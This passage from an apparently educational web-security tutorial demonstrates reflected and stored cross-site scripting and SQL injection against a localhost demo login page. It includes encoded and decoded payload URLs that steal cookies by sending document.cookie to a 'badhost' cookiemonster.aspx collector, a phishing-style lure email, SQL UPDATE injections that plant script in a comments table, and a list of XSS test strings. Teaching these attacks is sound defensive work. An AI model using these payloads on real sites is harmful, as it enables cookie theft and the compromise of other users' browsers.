Definition: Enables malicious
attackers to inject client-side script or HTML markup into web pages viewed by
other users.
Let say we have a login page and it will display an error
message for every unsuccessful attempt. The error message is stored within the
query string of the URL and later display in the Label control. See figure 11.
Figure 11
Consider this scenario, an anonymous user sends you an email
with the following content:
Listing 18
Dear Admin,
There is problem with the login page:
http://localhost:1234/Sample/LoginPage.aspx?strErr=%22%3E%3C%73%63%72%69%70%74%20%
73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%6
2%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E
%3C%2F%73%63%72%69%70%74%3E
Or
"There is problem with the login page http://localhost:1234/Sample/LoginPage.aspx"
with the URL pointing to the above link.
The part of the URL is encoded in Hexadecimal value. When
decoded, it will become:
Listing 19
http://localhost:1234/Sample/LoginPage.aspx?strErr=">
<script src="http://localhost:9997/badhost/maliciousscript.js"></script>
If we let our guard down and click on the link in the email,
the browser will execute the malicious scripts. Execute the URL and you should
see a pop-up message. Shown below is a script embedded in the query string to
steal browser cookies.
Listing 20
http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%76%61%
72%20%73%3D%27%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3
A%6E%6F%6E%65%22%20%53%52%43%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A
%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%63%6F%6F%6B%69%65%6D%6F%6E%73%74%65%72%2E%
61%73%70%78%3F%63%3D%27%2b%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6
F%6B%69%65%29%2b%27%3E%3C%5C%2F%49%46%52%41%4D%45%3E%27%3B%64%6F%63%75%6D%65%6E%74
%2E%77%72%69%74%65%28%73%29%3C%2F%73%63%72%69%70%74%3E
When decoded, it will look like:
Listing 21
http://localhost:1234/Sample/LoginPage.aspx?strErr=<script>var s='<IFRAME
style="display:none"
SRC=http://localhost:9997/badhost/cookiemonster.aspx?c='%2bescape(document.cookie)
%2b'><\/IFRAME>';document.write(s)</script>
The script will embed an IFRAME on to the page and pointing
to http://localhost:9997/badhost/cookiemonster.aspx with a query string
parameter "c". This parameter holds the cookies value created by the
"SQLInjection_XSS_Demo" application. To demonstrate this, I created
few cookies on the LoginPage.aspx. The cookiemonster.aspx
will record all the cookies names and values in the CookieJar.txt.
Listing 22
void FakeCookies()
{
Response.Cookies["email"].Value = "bryian.tan@mydomain.com";
Response.Cookies["email"].Expires = DateTime.Now.AddDays(1);
Response.Cookies["age"].Value = "22";
Response.Cookies["age"].Expires = DateTime.Now.AddDays(1);
}
After executing the above URL, we will see the below entries
in the CookieJar.txt.
Figure 12
So what? What the attacker going to do with my cookies
information? Let say the page will store some information in the cookies after
successful login attempt. Login using one of the username found in the tbl_users table then refresh the web page. The page will
pull out some information from the cookies and display the results on to the
page. See below.
Figure 13
Update table with malicious script
We already know the tables and columns name from the
previous example. Execute the URL shown in listing 23 to update the MyComment table with a JavaScript to tamper the cookies.
This script will inject a script into the cookies value. Then navigate to the ListComments.aspx page to trigger the script and navigate
back to LoginPage.aspx. You should see a popup message "XSS from bad
host" indicates that the script was successfully executed by the browser.
Listing 23
http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments
SET Comment = %27<scriptc="\<script
src=\">http://localhost:9997/badhost/maliciousscript.js\"><\/script>";
document.cookie = "email="%2bc;</script> test %27 WHERE id =1 --
Let append some malicious scripts to the MyComment
table. Execute the URL shown below.
Listing 24
http://localhost:1234/Sample/ListComments.aspx?cid=1
%55%50%44%41%54%45%20%4D%79%43%6F%6D%6D%65%6E%74%73%20%53%45%54%20%4E%61%6D%65%3D%
27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6
F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63
%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%20%2D%2D
The URL string, which when decoded, will become
Listing 25
http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments
SET Name='<script
src="http://localhost:9997/badhost/maliciousscript.js"></script>' --
Refresh the page, and we will see a popup message shown
below. This indicates that the malicious script crafted by the attacker was
successfully executed by the browser.
Figure 14
The URL shown below will embed a HTML IFRAME on to the page
and will trigger the cookiemonster.aspx page every time a user navigates to the
ListComments.aspx
page. Execute it, navigate to ListComments.aspx
page and observe that new contents are being appended to the CookieJar.txt file
without a trace or warning message.
Listing 26
http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments
SET Name= '<script>var s="<IFRAME style=display:none
SRC=http://localhost:9997/badhost/cookiemonster.aspx?c="%2bescape(document.cookie)
%2b"><\/IFRAME>";document.write(s)</script>' --
Quick test
Append any of the below string to your web pages URL that
take parameters. If you see a pop-up message, then the web page is subjected to
Cross-Site Scripting attack.
http://localhost:1234/Sample/LoginPage.aspx?strErr="><scrIpt>alert("XSS")</scriPt>
http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%61%6C%
65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
http://localhost:1234/Sample/LoginPage.aspx?strErr=</TITLE><sCRIPT>alert("XSS");</SCRIPt>
http://localhost:1234/Sample/LoginPage.aspx?strErr=<BODY%20ONLOAD=alert("XSS")>
http://localhost:1234/Sample/LoginPage.aspx?strErr="><iFRAME%20SRC="javascript:ale
rt('XSS');"></IFRaME> 
